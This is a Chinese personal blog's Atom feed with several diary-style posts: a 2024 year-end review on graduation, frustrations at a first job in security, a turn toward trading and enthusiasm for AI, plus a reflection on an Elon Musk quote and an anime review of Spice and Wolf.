<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Scammer</title>
  
  
  <link href="http://example.com/atom.xml" rel="self"/>
  
  <link href="http://example.com/"/>
  <updated>2024-12-29T15:01:13.820Z</updated>
  <id>http://example.com/</id>
  
  <author>
    <name>Bron</name>
    
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>2024年总结</title>
    <link href="http://example.com/2024/12/29/2024%E5%B9%B4%E6%80%BB%E7%BB%93/"/>
    <id>http://example.com/2024/12/29/2024%E5%B9%B4%E6%80%BB%E7%BB%93/</id>
    <published>2024-12-28T16:00:00.000Z</published>
    <updated>2024-12-29T15:01:13.820Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/ocean.png" alt="ocean"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>不知不觉中，2024年已经临近了终点，从开始写博客到现在，也有一年半了。还是有一段时间了，尽管最近半年来的更新频率越来越低，一方面是因为用Notion更多了，另一方面可能也是我的闲情雅致更少了。正好在这个时间点，我认为写一个年终总结也挺恰当。<br>年终总结是应该做的，但是我在心底不免还是有一丝的不安：我这一年真的往前走了多少？</p><h1 id="毕业"><a href="#毕业" class="headerlink" title="毕业"></a>毕业</h1><p>今年我毕业了，普普通通。<br>不过还好毕业了，我仍然记得答辩的时候被下面几个人刁难导致我差点没有毕业的情景。我对自己的答辩也算是很认真了，但是仍然差点没有拿到毕业证，出乎我意料的是并非内容上的不足，而是各种格式上的问题。甚至可以说这些人不看内容只看格式。<br>我自己的毕设是一个用Python写的web漏洞扫描器，依稀记得去年年底的时候还不知道要怎么做呢，后来决定用ChatGPT来帮我完成。花了几十个小时，还真的完成了。可以说AI为我渡过了毕设这个劫难。</p><p>这是GPT4的水平，说起今年年底OpenAI发布的O1模型，那又是另外一个领域的产物，如果说GPT4要花50个小时才能为我完成毕设，那么我想O1只需要5小时就够了。真正的10倍效率提升，就是这么强。</p><p>说远了，那么回到毕业的话题上来，可以说我完全是对中国大学失望，完全对当代教育失望。第一是形式主义泛滥，比如答辩老师不在乎做的内容，而仅仅在意形式；还有过去4年在大学中遭遇的各种事。第二可以说是第一点的延伸，即当代教育并非是以提高学生的综合能力为目标，而是被各种要么愚蠢、要么动机不纯的目的所裹挟，一片混乱。这儿所说的不仅仅是中国教育，全世界的教育都存在着严重的问题，譬如今年年中的时候质询美国三所顶尖学校的校长，曝出哈佛大学校长学术造假等问题。这个世界并不是纯净的，而是掺杂了各种杂质，有时甚至是杂质为主导。如果心安理得的不去思考这个世界，那么就是把选择权交了出去，不能说一定会过得不好，只是我宁愿做一个痛苦的人，而不是一只快乐的猪。</p><h1 id="工作"><a href="#工作" class="headerlink" title="工作"></a>工作</h1><p>关于工作，自是不必多说，我在未踏入社会的时候，确实单纯地可怜。我不去揣测别人的心思，不去思考各种可能性，只是一昧地走着。这便是我如今的结果。</p><h1 id="选择"><a href="#选择" class="headerlink" title="选择"></a>选择</h1><p>对于人生的道路，即使我不去往这方面想，我的潜意识告诉我，的确陷入了一种迷茫，正是有这种潜意识的迷茫，我才感受到自己的动力不足。</p><p>首先，我认为人要活下去，并不是那么地难，因为理论上很少有人生理性死亡，即饿死、冻死等等。且对于大多数人来说，真到了关乎生死存亡的危机性时刻，人们的求生意志是很强的。说这些我就是想表达，人要活下去可以通过任何一种方式活着，无论丑陋还是美丽。那么这就涉及到生存方式了，既然丑陋或美丽都能活着，那么应该按照哪一种方式活着就是一个选择，想要美丽的活着，这条路通常都很艰难。于是大多数人都是丑陋的活着，换个好听点的词就是平庸。于我个人而言，我把人的生存状态定义为三种：平庸、平凡、美丽。原本想详细定义这3种生存状态在我心理是什么样的，但我想了想也没必要。</p><p>那么我自己，如果没有不甘，而是满意地以当前生活状态活下去的话，我就是一个平凡的人：兢兢业业工作、下班了看看动漫玩玩游戏、时而与人相来往、或许若干年后有一个家庭之类的。<br>可是我就是不喜欢这种一眼看得到头的生活，一点惊喜、未知都没有。我既想要体验美好、我也想要拥抱未知、勇敢前行。但同时我又明白一点，我在能力上并不是了不起，并没有能够达到傲慢的地步。</p><p>Elon说得对，人唯一真正的货币是时间。本质上来说，上班就是把自己的时间卖给老板，做杂务就是把时间用于琐碎，低级快乐就是把时间挥霍浪费…人真正的富裕不在于拥有多少金钱，而在于有多少可支配时间。举例来说：喜欢做菜，可以，但这个事是可选还是强制的呢？根本上是因为我喜欢才做，还是因为迫于生计不得不做？人们很容易欺骗自我。<br>金钱可以用来换取时间，时间也可以换取金钱，可金钱失去了还能再来，时间失去了就再也没有。金钱与时间的平衡会让人更加惬意，但如果追及根本，人只能选择时间或金钱，那么正常人都会选择时间，因为只有金钱没有时间根本就没法使用！</p><p>于是，回到我人生的道路，如果我一直坚持把安全这条路走下去，那么或许若干年后，我会成为一个所谓的大牛，或许一个月几万的薪水都轻轻松松。在此之前，我需要把自己大部分的时间都投入到安全之中，如果我懈怠，那么等待我的就会是我不期望的平凡道路；如果没有懈怠，那么成为一个大牛也就到头了。不仅如此，在我成为大牛的路上，还需要忍受各种不自由，因为一个普通人是没有资格傲慢的。<br>因此，有另外一条曾经被我遗弃的道路又开始逐渐回归到我的眼中，那就是交易。抛开风险来说，交易就是最好的生意。这个看法我还是没有改变。掌握了交易的能力，就拥有了极大的自由。但毕竟交易这条路风险极高，难度也极高，否则大部分人早就涌入了。可就是这样一个风险极高、难度极高、还曾经被我抛弃的道路，为什么又回到了我的眼里呢？因为我想起了Elon的一句话：如果事情足够重要，就得去克服恐惧；如果事情足够重要，即使概率低也值得去做。是的，这条路并不简单，我还没有厉害到能够在这个高手林立的游戏中傲视群雄。<br>我认为，我的第一步一定是要活下去。先要做足够多的交易，这些交易即使金额小杠杆低也没关系，通过足够多的交易来培养盘感和快速分析判断的能力，来对各个交易理论进行熟悉、掌握和运用，找到最适合自己的交易规则。然后下一步是理解风险，战胜自我，坚持走下去，根据马太效应，要做到赢家通吃。并不需要考虑那么远的事，只需要当下尽全力做好即可。</p><p>当然，我选择了交易这条路，并不是说完全放弃了安全。我现在需要先找到一个平衡，慢慢地过渡。</p><h1 id="AI"><a href="#AI" class="headerlink" title="AI"></a>AI</h1><p>AI的发展非常迅猛，以Elon的话来说，AI将在2025年底，达到超越单个人类智力的水平，然后会是在2030年，达到超越人类群体最强的水平。所有行业都会被AI影响，所有行业（尤其是科技行业）都在对AI趋之若鹜。看看NVIDIA就知道了，市值暴涨至全球前3的水平，这可以看得出精英们对AI的期望有多大！<br>不关注、不使用AI，一定会落后于时代！<br>AI也会使人的差距越来越大，同样AI可以节省人们的时间，也就是说起到类似于金钱的作用。比如说当前的教育普遍是“平均教育”，一堆人坐在教室里，不管水平高低，都是一个老师在教，有钱的请私人教师，但是即便私人教师也很难24小时随时随地为人服务，但AI完美地解决了这个问题。现在的AI除了context和智力上还有不足，其它几乎无可挑剔。差距越来越大，不仅仅是认知上有没有使用的问题，还有是否能够负担得起的问题，现在已经显现出这个问题了。就比如说，原本各家AI公司的付费都是$20作为门槛，现在OpenAI把高级AI的价格提高到了$200，OpenAI最新展现的O3，据说使用一次的成本需要$3500，可以想见，未来的高级AI只有富人才用得起。差距是无法改变的，只会更大。<br>我曾经的客户通过AI增加了30%的经济收入，而很多人也发帖说AI给自己提高了多少效率。我自己也认为几乎离不开AI。认为AI一定要全自动地完成一个应用才算得上有用的人，完全是在走形式主义。</p><p>无论是哪儿都有很多人抱有愚蠢的观念。对AI不闻不问的是其中的最低。但仍有很多接触了AI的人还在抱有以下几种错误看法：</p><ol><li>第一类人认为自己现在还比AI强，所以没必要用，或是觉得替代不了自己的职业。殊不知AI日夜不停地在进步，无数显卡24小时运行就是为了打造世界最强AI，而且与人不同，人往往只是在一个特定的方面训练自己的能力，而AI是在几乎所有方面都在不断加强，在这种情况下AI还在飞速进步，可谓是令人恐怖。愚蠢的人只训练自己的一个方面还是花了几十年才有今天的水平，却瞧不起仅训练了几年还是所有方面都在训练的AI，抱着静态和单一的思维，注定了短视。</li><li>第二类人天天关注各种AI，对几百个AI都在尝鲜，一会儿又对市面上的一个新出AI惊奇不已。尽管现在非常流行，我仍然觉得这是一种愚蠢。AI目前来说就是工具，最强的工具无非就是通用方面的O1模型，画图方面的Midjourney等等，除非是所谓的职业或兴趣爱好，否则完全不必要一会儿换这个一会儿换那个。还是用Elon的一句话来说，重要的是快速达到目的，通往目的过程中采取的手段并不重要，花大量时间去比较A和B这2个路径哪个更好一点，是毫无必要的。对于天天折腾各种AI的人，我认为他们应该多去了解一下什么是第一性原理。</li><li>第三类人认为AI太贵了，现在免费的AI就够了。有这种想法的人要么是思想保守：虽然接触了新事物，但要稍微付出点代价，就不愿意再往前踏一步；要么是认知不足：认为AI给自己带来的提升不足以负担得起所支付的费用。如果免费的AI能够接触到最强AI，那么这样也无可厚非，但问题是并不能。只有通过付费才能接触到最强AI，那么付费就是不得不选的一条路了。</li></ol><h1 id="兴趣（动画、游戏）"><a href="#兴趣（动画、游戏）" class="headerlink" title="兴趣（动画、游戏）"></a>兴趣（动画、游戏）</h1><p>现在对于动画的兴趣感觉明显有所降低，原因是觉得动画太慢了。正常来说，看一话动画，就必须得是这么多时间，这样我在这么多时间内就只能获取到这么多信息，这就不是我自己能控制的时间。与玩游戏和看书不同，这些都是能通过我主动操作，去改变的。所以现在除了一些有趣的动画，我很难再花时间在这上面。</p><h1 id="play-to-win"><a href="#play-to-win" class="headerlink" title="play to win"></a>play to win</h1><p>半途而废太多了，参与就要到最后！这是我应该首先告诫自己的。无论一个多么好的想法，多么美妙的开局，没有始终如一的行动都是空！<br>回想起来我曾经也自己说过一句类似的话：如果不能一直玩下去，我宁愿不参与！</p><p>Elon绝对是我近5年里给我影响最大的人物了，我从去年开始深入了解Elon，今年对他的话理解地更加深入，更多地运用到自己的行动之中。同时，我也始终相信，如果要立一个学习的榜样，只需要向该领域取得成就最大的人学习即可，而无需向一些中等偏上、还算不错的人学习，除非这个人的行为习惯很契合自身。而Elon就相当于是当今活在世上的人中最了不起的人，得益于互联网信息发达，也能从他的公开访谈、文字中获取到很多值得学习的东西，没有谁比向他学习更恰当的了。</p><h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>其实想写的东西很多，但实在是写不完，即使是这些内容也花了2个多小时写了。以后有兴致再写一些~</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/ocean.png&quot; alt=&quot;ocean&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>Elon一句话的思考</title>
    <link href="http://example.com/2024/12/16/Elon%E4%B8%80%E5%8F%A5%E8%AF%9D%E7%9A%84%E6%80%9D%E8%80%83/"/>
    <id>http://example.com/2024/12/16/Elon%E4%B8%80%E5%8F%A5%E8%AF%9D%E7%9A%84%E6%80%9D%E8%80%83/</id>
    <published>2024-12-15T16:00:00.000Z</published>
    <updated>2024-12-16T02:33:06.586Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/elon1.png" alt="Elon Musk"></p><span id="more"></span><h1 id="一句话"><a href="#一句话" class="headerlink" title="一句话"></a>一句话</h1><p>Play to win, or not to play at all.<br>参与就要赢，否则就不要参与。</p><h1 id="目的与手段"><a href="#目的与手段" class="headerlink" title="目的与手段"></a>目的与手段</h1><p>重要的是目的，而不是手段。<br>所有事物或行动上，都应当首先搞清楚目的是什么？<br>大部分人常常没有搞清楚目的，或是一个很模糊的目的就开始了行动，三天两头不断更换手段。进行到了一个阶段，就开始因为各种各样的原因放弃。我过去常常轻易地认为什么事是沉没成本。但是我弄错了一个事情：只有手段是可以放弃的沉没成本，而目的本身应始终保持不变，作为决策的核心。<br>如果目的和手段都是正确的，无论再怎么艰难，也不应当借口“沉没成本”来逃避或放弃。而应当保持着Play to win, or not to play at all的决心。</p><p>一个人参与了，却说自己不在乎目的，那么毫无意义，只是浪费时间。或者，这个人根本不清楚自己的目的在哪里，那么同样毫无意义。又或者，只是单纯害怕竞争罢了。要么赢，要么别参与。</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/elon1.png&quot; alt=&quot;Elon Musk&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>狼与香辛料 观后感</title>
    <link href="http://example.com/2024/09/25/%E7%8B%BC%E4%B8%8E%E9%A6%99%E8%BE%9B%E6%96%99%20%E8%A7%82%E5%90%8E%E6%84%9F/"/>
    <id>http://example.com/2024/09/25/%E7%8B%BC%E4%B8%8E%E9%A6%99%E8%BE%9B%E6%96%99%20%E8%A7%82%E5%90%8E%E6%84%9F/</id>
    <published>2024-09-24T16:00:00.000Z</published>
    <updated>2024-09-25T13:24:26.803Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/holo_s2.png" alt="holo"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>这几天，狼与香辛料的动画重制版落下了帷幕，因此我也想来聊一聊这部动画的观后感。</p><h1 id="赫萝"><a href="#赫萝" class="headerlink" title="赫萝"></a>赫萝</h1><p>整部动画中，最有魅力的无疑是女主角赫萝了，这是一位活了数百年的丰收之神，巨大的狼身会化作美丽的少女。无论是在剧中剧外，都令许多人魂牵梦绕。可以说赫萝是在我看过的动画里排名前三喜欢的女主角了。没错，赫萝就是有这样的魅力，不仅仅是因为她的可爱让人心动不已，更多的是包含了狼的狡黠与那数百年来积累的智慧。</p><p>可爱又美丽的少女世间并不缺少，无论是现实中还是动画中。如果一位少女可爱且柔弱，那么会显得楚楚动人；如果一位少女美丽却又神勇无比，那么往往会被人称作英姿飒爽；女生外表的成熟会让人称呼御姐；外表的吸引力会让人觉得撩人或是妩媚。总之，这世间早就有着无数存在魅力的女生，让人给这些女生取了难以统计的形容词。</p><p>那么赫萝给人的感受是什么样的呢？首先，第一眼见到她的是一种清冷而美丽的感觉，但是一开始相处，冰山瞬间就融化得无影无踪了，取而代之的是那种捉摸不透的感觉，并非是身世背景，更多的是个性情绪，能够感受到眼前的这位女生一眼就看穿自己心中的想法，却又不清楚对方在想什么，会因什么而发怒或是高兴，因此就会有些捉摸不透。越是相处越是能感受到其身上存在的智慧，并非商人，却能比行商多年的人做得更出色。可是这位狼神对交易并没有什么兴趣，不过是为了讨份口粮罢了。以下的这些台词也是挺有趣的：</p><ol><li>被骗时只懂得生气的人根本不成对手，应该要懂得佩服这种手法，才算是真正的商人。</li><li>旅行唯有出发前最愉快，狗儿唯有叫声最吓人，女人唯有背景最美丽。随随便便抛头露面，会坏了人家的美梦，这种事情咱可做不来。</li><li>说谎的重点不在于内容本身，而在于为什么要说谎。</li><li>所有雄性都是爱吃醋的傻瓜呐。不过，雌性也是会因此感到高兴的傻瓜。</li></ol><p>当男主面对着超过自身智慧的女主，也能相处的很好，真是令人羡慕呢~</p><h1 id="互动"><a href="#互动" class="headerlink" title="互动"></a>互动</h1><p>不仅仅是赫萝一个角色，角色之间的互动也是一大看点，正是这点才让我欲罢不能。不然也不会叫夫妻行骗记了hh。</p><h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>火速宣布了第二季制作决定，真不错，又可以看夫妻行骗了。<br>ps：今天想写，但真没感觉，可能是因为上班累了或是其它什么吧。</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/holo_s2.png&quot; alt=&quot;holo&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="动画" scheme="http://example.com/categories/%E5%8A%A8%E7%94%BB/"/>
    
    
    <category term="动画" scheme="http://example.com/tags/%E5%8A%A8%E7%94%BB/"/>
    
  </entry>
  
  <entry>
    <title>2024年5-8月感想</title>
    <link href="http://example.com/2024/09/01/2024%E5%B9%B45-8%E6%9C%88%E6%84%9F%E6%83%B3/"/>
    <id>http://example.com/2024/09/01/2024%E5%B9%B45-8%E6%9C%88%E6%84%9F%E6%83%B3/</id>
    <published>2024-08-31T16:00:00.000Z</published>
    <updated>2024-09-17T09:02:17.575Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/Elaina_71.jpg" alt="Elaina"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>好久没有写日志了，究其原因，无非就是人性的弱点，懒散罢了。<br>但是我不愿就此结束，一旦躺下，有时就再也不会起身了。<br>因此今天为了让香火不断，写了此日志。</p><h1 id="情"><a href="#情" class="headerlink" title="情"></a>情</h1><p>越来越难“有情”了。<br>不知从何而起，也许是从大学开始吧。而到现在越演越烈，如果不是刻意调动，似乎都无法展现出来。即使刻意调动，更多也是一种模拟。</p><p>要如何才好呢？是接受吗？抑或是反抗？<br>我不知道，但是以我的判断标准来说，接受意味着失去，我不喜欢失去。那么我的选择只能是反抗。</p><h1 id="工作"><a href="#工作" class="headerlink" title="工作"></a>工作</h1><p>自从3月份工作以来，到现在9月份，也是差不多半年了。这段时间飞逝，我并不满意自身的行为，但也明白了在公司工作是一种什么感觉。</p><h3 id="第一次写"><a href="#第一次写" class="headerlink" title="第一次写"></a>第一次写</h3><ol><li><p>第一阶段（3-4月）：一开始把工作想象得太难了。以至于在面对公司时底气不足，无论是从谈薪资、处事方式、工作量等等方面皆是如此。因此最初谈薪资时我的态度并不强硬，常常中午晚上加班也并不在意，对于一些能力不足的同事说得错误的地方虽然我有疑惑，却也没有质疑。一门心思只想把工作做好，努力学习新的知识提升自己。老板那些忽悠人的话并没有辨别出来，自己也是希望能够踏实地在公司做事。</p></li><li><p>第二阶段（5-7月）：已经熟络了不少的工作，并且心态转变为不再畏惧未知。因为前期做的工作，让我意识到很多困难都是想象出来的，本身并没有那么难。如果以第一性原理思考，那么其实无非就是几个步骤搭配一下先后顺序就可以解决的问题。此时我已经比较有信心了，遇到了什么会去思考好的解决方式，不再认为同事所说是正确答案或指引方向，面对同事的做法我也会质疑。我希望能够以最高效率迅速高质量地解决问题，这段时间的我不仅是个工作狂，还尽可能排开其它阻碍。也是在这段时间，在我没有意识到的情况下，招致了公司高层的反感。</p></li><li><p>第三阶段（7-8月）：基本上熟悉了公司业务，也看清了公司的面目。拿到毕业证后转正，与公司高层第一次转正谈话，本以为说了没什么，于是我毫无保留地说出了自己内心的感受，也说了这段时间我做了多少工作，付出的精力与做出的贡献。殊不知正是这次谈话让我看清了公司的面目。我也才知道，踏入社会后的一些区别。说出真心话，真诚地面对并不一定能够获得最好的结果，有时甚至会付出巨大的代价。这次谈话中对我是一个全面地批评，其中之重则是不懂感恩。在后来第二次谈话中，更是被定下了仅有几k的薪资，仅仅比实习薪资高一点。我觉得这是一个莫大的讽刺：我实习时经常无偿加班，上班时间几乎没有做过其它事，全心全意地为公司工作，相比于某些老同事我的工作量甚至是对方的3倍以上，但工资甚至还没对方高。我自认为对公司问心无愧，却被不信任，被说不懂感恩。在这个阶段，我就不再为公司尽全力了，只要能完成最低限度的事就行。其它时间我会做自己的事。反正给多少钱，做多少事。即使公司有做得不对的地方，我也不会指出来，错就错吧。免得说我半壶水响丁当。今天得知了同事要辞职，尽管有些担心他的下家何时能找到，心里还是觉得他做得对，下了决心，便一往无前。</p></li></ol><h3 id="第二次写"><a href="#第二次写" class="headerlink" title="第二次写"></a>第二次写</h3><p>上面絮絮叨叨说了一堆概述性的东西，下面来讲一讲这个公司的总体感受。<br>初入公司时，确实觉得公司的环境还不错，好像同事们都挺亲切的。问了下某位同事的薪资，也还比较可观的样子，当时想着以自己的表现能拿到同事的薪资那么也还不错。加上初期不熟悉公司的事务，倒也还算其乐融融。<br>后来在我入公司后第二次员工大会召开，我与公司高层交流了一番，发现了自身不足的同时，也发现了高层的问题，所谓的“国外的书不值得读”正是其中令我印象最深的。这个时候我就感受到公司的一些不对之处了。但我还没有想太多，仍然只是尽心尽力工作，甚至那个时候，当天完不成的工作我还会回家完成。<br>第二个时间点便来到了某位四月份面试的新同事，国护结束了才来公司。这令我和其他同事都产生了不满，因为如果可以国护结束再进公司，那么我当初为什么要先进公司呢，为何不先去赚个几万块回来再找工作？甚至这位同事还没有踏入公司的门就已经进入了所谓的部门核心群。这是第二件令我非常不满意的事。<br>第三件事便是转正谈话，在这一次谈话中我没有大的保留，把心中所想说了七七八八。不曾想这却使我陷入了不利状况，被高层全面批斗，所谓的不感恩，浮躁等等。也就是从这个时候开始，我才真正地审视了公司，才真正与同事们建立了更深入的联系。之前的我，心中所想只是把工作做好，拿到满意的报酬就行。这一刻，我才开始关注起公司本身。<br>薪资方面：由于之前问了一位同事的薪资，看起来还不错，我本以为是普遍都比较高。然而我问了其他同事后，我才发现其实普遍都低，那位工资可观的人只是特例罢了。我才明白自己的工资可能不会是预想的那样。<br>信任方面：公司会建立非常多的小群，极其不信任员工。且自那次谈话以后，也更不被信任，更多的事也不再知悉。于我而言，我比较赞同黄仁勋的信息透明，在同一部门内的人应当知悉部门的大部分事务，而不是当被委派到了某件事时，才知道一点点对应的信息。保密当然重要，但部门内的事务大部分并没有什么保密的必要可言，这种做法只会大大增加沟通成本。<br>工作方面：尽管我三番五次提出工作方面的建议，但却几乎没有被采纳，反而是被看成刚出社会什么都不懂的形象。首先工作的流程管理堪称灾难，经常都完不成预定目标。某某单位需要做应急演练，5月底6月份一直在提，却能被拖到9月；某某单位的EDR安装屡次被推迟进度……要求写一些周计划，毫无意义，常常都不会按照计划执行。有的人在部门里偷奸耍滑一天什么都不做，高层却还认为其人诚实单纯，连员工的工作状态都不清楚，反而能指责我这种勤勤恳恳工作的人不感恩、浮躁等，可谓是本末倒置。不懂得改进工作，因为我才毕业，提出的建议就认为毫无价值。经常一个屁大点儿的事就要开会，而且要开至少1个小时，浪费时间精力。<br>高层方面：话术真的挺多，一开始我想着只要我有诚意（卖力工作），能够达到目的（获得可观的薪资待遇），那么其实不在意也没关系。但既然没有达到目的，那么回过头来看，这些话术就挺让我不适了。首先便是“一副真诚的样子，什么都可以说”；其次是故意营造那种环境艰难、工作困难、恐慌情绪，搞得好像留在这公司好像才是唯一的选择；还有什么五险一金交xxx钱的话术等等。说得不好听点，其实就是洗脑。当时想签三方却被高层无情拒绝，也是间接地让我毕业设计滋生出那么多事。还有明明什么技术都不懂，对于一个安全能力不如我的人，却非要让我说我不如他，非要让我说他教给我很多东西，我讨厌不真实，这次妥协是因为我没搞清楚事态。此后面对高层及其他人，我宁愿得罪，也不要说让我自己感觉不真实的话。<br>制度方面：加班还要主动申请经过审批，而且还要至少2小时以上，不然即使实质加班，也没有一分钱可拿。明面上好像加班有加班费还挺公道，实际上把流程搞得这么复杂就是为了不想让人拿钱。报销也是麻烦得要死，吃个饭如果不是在某个特定的地方吃，还需要发票+付款截图。而其他公司都是直接按“天数x报销额度”发钱，只能说这公司真他妈小气。还有那个全勤奖也是弱智操作，平时谁没事会请假，都是有事才请。请个假除了扣当天的钱，还要扣个几百的全勤，基本上可以说请一天假，几天就白干了。另外公司介绍上有很多所谓的补贴，实际上当转正后，这些补贴根本就算不了几个钱。发提成延后一年才发，故意把人卡着，一堆套路操作。<br>总的来说，这并不是一家让我感觉舒适的公司。</p><h3 id="第三次写"><a href="#第三次写" class="headerlink" title="第三次写"></a>第三次写</h3><p>写写删删好几次，对于自己的第一份工作，总归是不满意的。<br>首先，如果觉得打工，只是单纯地完成工作获取相应报酬，那么就太简单了。只要是有人的公司，那么不可避免地就要与人打交道，如果是分了上下级，那么不可避免地产生权力。古往今来，人们对权力是又爱又恨，无数诗人作家为着权力撰写出了一个个故事，那真是太精彩。置身其中的我，也成了当局者迷中的一枚棋子。<br>因为我在大学中没有加入任何一个圈子，只是随心所欲地过着那样的生活，因此也不曾经过社会的考验。漫步走入21世纪，人们总是在提倡着社会达尔文主义已被唾弃，人人都是平等地友爱公民。在我看来完全是胡扯，人们之所以把社会描绘地与学校这样的环境不同，那是因为“社会”这个词本身就是社会达尔文主义的缩写。进入社会进入公司是种什么感觉呢？首先而来的就是不适应，不羁的内心，接着就被掌握着权力的人尽情碾压。蔑视这个词，再好不过了。三流的管理、微薄的薪资、无趣的工作就是这家公司的真实写照。<br>我能感受到自己的变化，单从写这段工作经历来说，我第一次写的时候完全是以工作汇报的形式来写，第二次写的时候又完全是以事无巨细怨气冲天的风格来写。写完了这2次，我才意识到自己，已然被社会悄然无息地改变。但万幸的是，我并不打算屈服，什么狗屁老板，什么狗屁感恩，老子偏不，喜欢做牛马的人们，就让他们做去罢。待遇不公，就换下家，要是哪里待着都不舒服，就自己干！</p><h1 id="非凡"><a href="#非凡" class="headerlink" title="非凡"></a>非凡</h1><p>想要成就非凡的事业，就必须有非凡的行动。</p><h1 id="念"><a href="#念" class="headerlink" title="念"></a>念</h1><p>各种念，即我念。</p><h1 id="永生"><a href="#永生" class="headerlink" title="永生"></a>永生</h1><p>死亡从根本上来说是信息的丧失。如果能够存储记忆，那么某种意义上就是一种永生。</p><h1 id="质疑"><a href="#质疑" class="headerlink" title="质疑"></a>质疑</h1><p>不管提需求的人有多么聪明，他们在一定程度上总是愚蠢的。尽量减少问题错误的概率，这就是质疑的意义。</p><h1 id="删除"><a href="#删除" class="headerlink" title="删除"></a>删除</h1><p>大胆删除流程，如果删了之后没有被迫再加回去，那就是太保守。我们的神经边缘系统在误导我们，因为当我们删除了必要部分后来不得不加回来，就会让我们感到痛苦，从而让人过度纠正，然后东西越加越多，把事情搞得过于复杂。所以你必须故意去做删除，删的比应该删的还要多。</p><h1 id="遗忘"><a href="#遗忘" class="headerlink" title="遗忘"></a>遗忘</h1><p>对于喜欢的东西，如果不做什么来记住它，很快就会遗忘了。</p><h1 id="认知"><a href="#认知" class="headerlink" title="认知"></a>认知</h1><p>人们所谓的提高认知，往往只是在加深自己的偏见。因为他们始终是在认知的基础上去做判断，这是一种路径依赖。这么做并不一定是对的，但确实很省精力。<br>我喜欢elon的一句话：你应该始终假设你是错的，你的目标是减少错误。</p><h1 id="问题"><a href="#问题" class="headerlink" title="问题"></a>问题</h1><p>如果只是花确切的时间或金钱就能解决的问题，那不是真正重要的问题，那是待办事项。<br>于个人和世界而言，真正重要的问题是，无法用精确的时间和金钱衡量却又有着重要意义的事。</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/Elaina_71.jpg&quot; alt=&quot;Elaina&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>2024年4-5月感想</title>
    <link href="http://example.com/2024/05/12/2024%E5%B9%B44-5%E6%9C%88%E6%84%9F%E6%83%B3/"/>
    <id>http://example.com/2024/05/12/2024%E5%B9%B44-5%E6%9C%88%E6%84%9F%E6%83%B3/</id>
    <published>2024-05-11T16:00:00.000Z</published>
    <updated>2024-05-12T02:25:44.504Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/Elaina_58.jpg" alt="伊蕾娜"></p><span id="more"></span><h1 id="思考的方向"><a href="#思考的方向" class="headerlink" title="思考的方向"></a>思考的方向</h1><p>你必须搞清楚，什么是你该建议的，什么是不应该花精力去思考的。因为不是每个人都是笨蛋。</p><h1 id="AI"><a href="#AI" class="headerlink" title="AI"></a>AI</h1><p>如果你进步的速度没有AI改变世界的速度快，那么你终究会被淘汰。</p><h1 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h1><p>大部分人认为别人想得太多，而不是自己想得太少。</p><h1 id="快乐与痛苦"><a href="#快乐与痛苦" class="headerlink" title="快乐与痛苦"></a>快乐与痛苦</h1><p>人们痛苦，是因对痛苦不曾麻木；<br>人们快乐，是因对快乐永不满足。</p><h1 id="臆想"><a href="#臆想" class="headerlink" title="臆想"></a>臆想</h1><p>人们会对自己不了解的东西产生臆想。</p><h1 id="Elaina"><a href="#Elaina" class="headerlink" title="Elaina"></a>Elaina</h1><p>伊蕾娜给我的感觉就是一眼看不完。明明伊蕾娜第一眼看去已经很惊艳了，但当我细细看去时，又能发现很多一开始没注意到的地方，这些地方也很美，然后当这些细节与整体汇集起来，变成了更深层次的美。</p><h1 id="牺牲与完美"><a href="#牺牲与完美" class="headerlink" title="牺牲与完美"></a>牺牲与完美</h1><p>不要老一开始就想着牺牲谁或是什么，首先要想怎么在现有框架或要求下拿满分，能够拿到满分了还要想怎么去做到完美。</p><h1 id="company-amp-home"><a href="#company-amp-home" class="headerlink" title="company &amp; home"></a>company &amp; home</h1><p>Don’t let company as your home, because company could be fire you, but home no.</p><h1 id="日语歌词"><a href="#日语歌词" class="headerlink" title="日语歌词"></a>日语歌词</h1><p>以前因为听不懂，没怎么注意日语歌的歌词，最近才发现这些歌词写得挺不错的。真是不仅歌好听歌词也好。</p><h1 id="time"><a href="#time" class="headerlink" title="time"></a>time</h1><p>所有不珍惜时间的行为都会让我心生厌恶。</p><h1 id="think"><a href="#think" class="headerlink" title="think"></a>think</h1><p>十年饮冰，难凉热血。</p><h1 id="time-1"><a href="#time-1" class="headerlink" title="time"></a>time</h1><p><a 